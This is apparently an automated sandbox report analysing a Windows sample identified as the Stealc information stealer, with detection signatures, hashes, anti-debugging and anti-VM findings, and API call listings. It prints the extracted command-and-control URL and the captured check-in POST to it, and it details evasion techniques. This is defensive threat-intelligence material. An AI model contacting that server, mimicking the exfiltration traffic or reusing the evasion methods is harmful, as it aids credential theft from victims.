Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544173
MD5: ddaa0462b7b18caecc3dac2c4b87dd91
SHA1: 356ec8395b16445164e12c0b238f7fd1af7168bf
SHA256: 5026b4a52abc821ed17b10cbe59d4ec4c0a8131d1736dfb89d1e568abee5ab27
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5912 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DDAA0462B7B18CAECC3DAC2C4B87DD91)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2153163203.00000000053C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5912 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 5912 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.970000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alert:
Timestamp: 2024-10-28T23:48:09.074209+0100 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.6 | Source Port: 49711 | Destination IP: 185.215.113.206 | Destination Port: 80 | Protocol: TCP

AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.970000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: file.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00989030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00989030
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0097A2B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009772A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_009772A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0097A210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0097C920
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2153163203.00000000053EB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2153163203.00000000053EB000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009840F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009840F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0097E530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0097F7B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009847C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009847C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00971710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00971710
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0097DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00983B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00983B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00984B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00984B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0097EE20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0097BE40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0097DF10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDG
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 37 30 33 31 41 44 44 34 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a
Data Ascii:
------JECBGCFHCFIDHIDHDGDG
Content-Disposition: form-data; name="hwid"

B47031ADD41E2643095942
------JECBGCFHCFIDHIDHDGDG
Content-Disposition: form-data; name="build"

tale
------JECBGCFHCFIDHIDHDGDG--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009762D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_009762D0
Source: unknown | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDG
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 37 30 33 31 41 44 44 34 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a
Data Ascii:
------JECBGCFHCFIDHIDHDGDG
Content-Disposition: form-data; name="hwid"

B47031ADD41E2643095942
------JECBGCFHCFIDHIDHDGDG
Content-Disposition: form-data; name="build"

tale
------JECBGCFHCFIDHIDHDGDG--
Source: file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2241492320.0000000001869000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2241492320.0000000001869000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php1B
Source: file.exe, 00000000.00000002.2241492320.0000000001869000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpYB
Source: file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpt
Source: file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/=c
Source: file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/Pc
Source: file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206k
Source: file.exe, file.exe, 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2153163203.00000000053EB000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B0098
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CB198
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA1AF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A2138
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA114
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DC5102
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CEB13B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B4288
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD9274
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DE258
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009ED39E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD13BB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCF34E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009FB308
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7A413
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD4436
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B45A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DD5A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099E544
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00994573
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B66C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F96FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EA648
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E6799
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD720
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D0B700
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C98B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CB8A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DF8D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCD8B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C4868
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D809A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD7962
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF692D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC2AA3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E0B88
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E4BA8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D8BD9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EAC28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DC6C03
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C5DB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C4DC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DC8D4F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DAD38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A1D78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CBD68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCBD28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E1EE8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B8E78
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00974610 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: uwjugjop ZLIB complexity 0.9949328516340867
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00989790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00989790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00983970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00983970
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\AOX2AIN8.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 42%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 2114560 > 1048576
Source: file.exe | Static PE information: Raw size of uwjugjop is bigger than: 0x100000 < 0x199400

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.970000.0.unpack :EW;.rsrc :W;.idata :W; :EW;uwjugjop:EW;radqkvcl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;uwjugjop:EW;radqkvcl:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00989BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00989BB0
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x2049c5 should be: 0x208bb8
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: uwjugjop
Source: file.exe | Static PE information: section name: radqkvcl
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099A0DC push eax; retf 0_2_0099A0F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA406F push esi; mov dword ptr [esp], edi 0_2_00EA40DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E681F0 push ebx; mov dword ptr [esp], 1EEBF1B6h 0_2_00E68212
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E761A4 push 31AFC9DFh; mov dword ptr [esp], ebp 0_2_00E761CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E761A4 push eax; mov dword ptr [esp], edx 0_2_00E761F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E311A8 push eax; mov dword ptr [esp], ecx 0_2_00E31299
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E441AF push eax; mov dword ptr [esp], 5CB1EF80h 0_2_00E441E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E441AF push 5F139409h; mov dword ptr [esp], ecx 0_2_00E442B3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E3C1AE push eax; mov dword ptr [esp], edx 0_2_00E3C1B2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E211B8 push 558689C1h; mov dword ptr [esp], ecx 0_2_00E211CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA1AF push 270F30DBh; mov dword ptr [esp], esp 0_2_00DBA1F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA1AF push ebp; mov dword ptr [esp], eax 0_2_00DBA208
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA1AF push ebp; mov dword ptr [esp], eax 0_2_00DBA2F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF190 push 6C19ED15h; mov dword ptr [esp], ecx 0_2_00EAF1D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF190 push edi; mov dword ptr [esp], 7DE795EFh 0_2_00EAF1FB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E64168 push 458E3E5Ch; mov dword ptr [esp], ebp 0_2_00E64197
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099A106 push eax; retf 0_2_0099A119
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA3158 push edx; mov dword ptr [esp], ebp 0_2_00EA3178
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA3158 push edi; mov dword ptr [esp], 02CB7498h 0_2_00EA3194
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEC118 push 36957DDDh; mov dword ptr [esp], ebx 0_2_00DEE555
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA114 push 48DDD739h; mov dword ptr [esp], ebp 0_2_00DCA11C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA114 push ebx; mov dword ptr [esp], edx 0_2_00DCA12B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA114 push edi; mov dword ptr [esp], 094F7EDFh 0_2_00DCA146
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA114 push eax; mov dword ptr [esp], ebx 0_2_00DCA151
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA114 push ecx; mov dword ptr [esp], ebp 0_2_00DCA1B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA114 push ebp; mov dword ptr [esp], eax 0_2_00DCA1BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA114 push ecx; mov dword ptr [esp], esi 0_2_00DCA234
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA114 push esi; mov dword ptr [esp], 2929A9E6h 0_2_00DCA238
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA114 push edx; mov dword ptr [esp], edi 0_2_00DCA24E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA114 push 3013E15Fh; mov dword ptr [esp], eax 0_2_00DCA268
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA114 push esi; mov dword ptr [esp], eax 0_2_00DCA2DA
Source: file.exe | Static PE information: section name: uwjugjop entropy: 7.954930904416413

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-37499
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1DEF1 second address: E1DEFF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE478BEC546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B02A second address: E1B090 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, dx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov edi, 07371046h 0x00000019 movzx edi, cx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007FE478F58EB8h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d mov eax, dword ptr [ebp+122D15A1h] 0x00000043 sub dword ptr [ebp+122D2785h], esi 0x00000049 push FFFFFFFFh 0x0000004b jbe 00007FE478F58EB8h 0x00000051 mov bh, 61h 0x00000053 push eax 0x00000054 push edi 0x00000055 push eax 0x00000056 push edx 0x00000057 jns 00007FE478F58EB6h 0x0000005d rdtsc
